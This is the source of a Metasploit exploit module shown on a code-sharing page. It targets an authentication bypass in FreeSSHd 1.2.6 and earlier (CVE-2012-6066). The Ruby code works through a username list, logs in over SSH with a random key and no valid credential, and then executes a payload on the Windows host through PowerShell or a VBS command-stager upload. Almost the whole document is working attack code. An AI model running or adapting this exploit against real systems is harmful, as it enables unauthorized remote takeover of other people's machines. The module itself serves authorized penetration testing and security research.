Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ssh/freesshd_authbypass.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Powershell

11
  include Msf::Exploit::CmdStager

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "Freesshd Authentication Bypass",

18
        'Description' => %q{

19
          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass

20
          authentication. You just need the username (which defaults to root). The exploit

21
          has been tested with both password and public key authentication.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Aris', # Vulnerability discovery and Exploit

26
          'kcope', # 2012 Exploit

27
          'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module

28
          'Imran E. Dawoodjee <imrandawoodjee[at][email protected]> (minor improvements)' # minor improvements

29
        ],

30
        'References' => [

31
          ['CVE', '2012-6066'],

32
          ['OSVDB', '88006'],

33
          ['BID', '56785'],

34
          ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],

35
          ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']

36
        ],

37
        'Platform' => 'win',

38
        'Privileged' => true,

39
        'Targets' => [

40
          ['PowerShell', {}],

41
          ['CmdStager upload', {}]

42
        ],

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2010-08-11',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(22),

56
        OptString.new('USERNAME', [false, 'A specific username to try']),

57
        OptPath.new(

58
          'USER_FILE',

59
          [

60
            true,

61
            "File containing usernames, one per line",

62
            # Defaults to unix_users.txt, because this is the closest one we can try

63
            File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")

64
          ]

65
        )

66
      ]

67
    )

68
  end

69


70
  def check

71
    connect

72
    banner = sock.recv(30)

73
    disconnect

74
    if banner.match?(/SSH\-2\.0\-WeOnlyDo/)

75
      version = banner.split(" ")[1]

76
      return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)

77


78
      return Exploit::CheckCode::Detected

79
    end

80
    Exploit::CheckCode::Safe

81
  end

82


83
  def execute_command(cmd, _opts = {})

84
    @connection.exec!("cmd.exe /c " + cmd)

85
  end

86


87
  def setup_ssh_options

88
    {

89
      password: rand_text_alpha(8),

90
      port: datastore['RPORT'],

91
      timeout: 1,

92
      proxies: datastore['Proxies'],

93
      key_data: OpenSSL::PKey::RSA.new(2048).to_pem,

94
      auth_methods: ['publickey'],

95
      verify_host_key: :never

96
    }

97
  end

98


99
  def do_login(username, options)

100
    print_status("Trying username '#{username}'")

101
    options[:username] = username

102


103
    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)

104
    auth = Net::SSH::Authentication::Session.new(transport, options)

105
    auth.authenticate("ssh-connection", username, options[:password])

106
    connection = Net::SSH::Connection::Session.new(transport, options)

107
    begin

108
      Timeout.timeout(10) do

109
        connection.exec!('cmd.exe /c echo')

110
      end

111
    rescue Timeout::Error

112
      print_status("Timeout")

113
      return nil

114
    rescue RuntimeError

115
      return nil

116
    end

117
    connection

118
  end

119


120
  #

121
  # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.

122
  # So we have to write our own each_user here.

123
  #

124
  def each_user

125
    user_list = []

126
    if datastore['USERNAME'] && !datastore['USERNAME'].empty?

127
      user_list << datastore['USERNAME']

128
    else

129
      f = File.open(datastore['USER_FILE'], 'rb')

130
      buf = f.read

131
      f.close

132


133
      user_list = (user_list | buf.split).uniq

134
    end

135


136
    user_list.each do |user|

137
      yield user

138
    end

139
  end

140


141
  def exploit

142
    unless [CheckCode::Vulnerable].include? check

143
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'

144
    end

145


146
    options = setup_ssh_options

147


148
    @connection = nil

149


150
    each_user do |username|

151
      next if username.empty?

152


153
      @connection = do_login(username, options)

154
      break if @connection

155
    end

156


157
    if @connection

158
      case target.name

159
      when 'PowerShell'

160
        print_status('Executing payload via Powershell...')

161
        psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)

162
        @connection.exec!("cmd.exe /c " + psh_command)

163
      when 'CmdStager upload'

164
        print_status("Uploading payload, this may take several minutes...")

165
        execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)

166
      end

167
    end

168
  end

169
end

170


171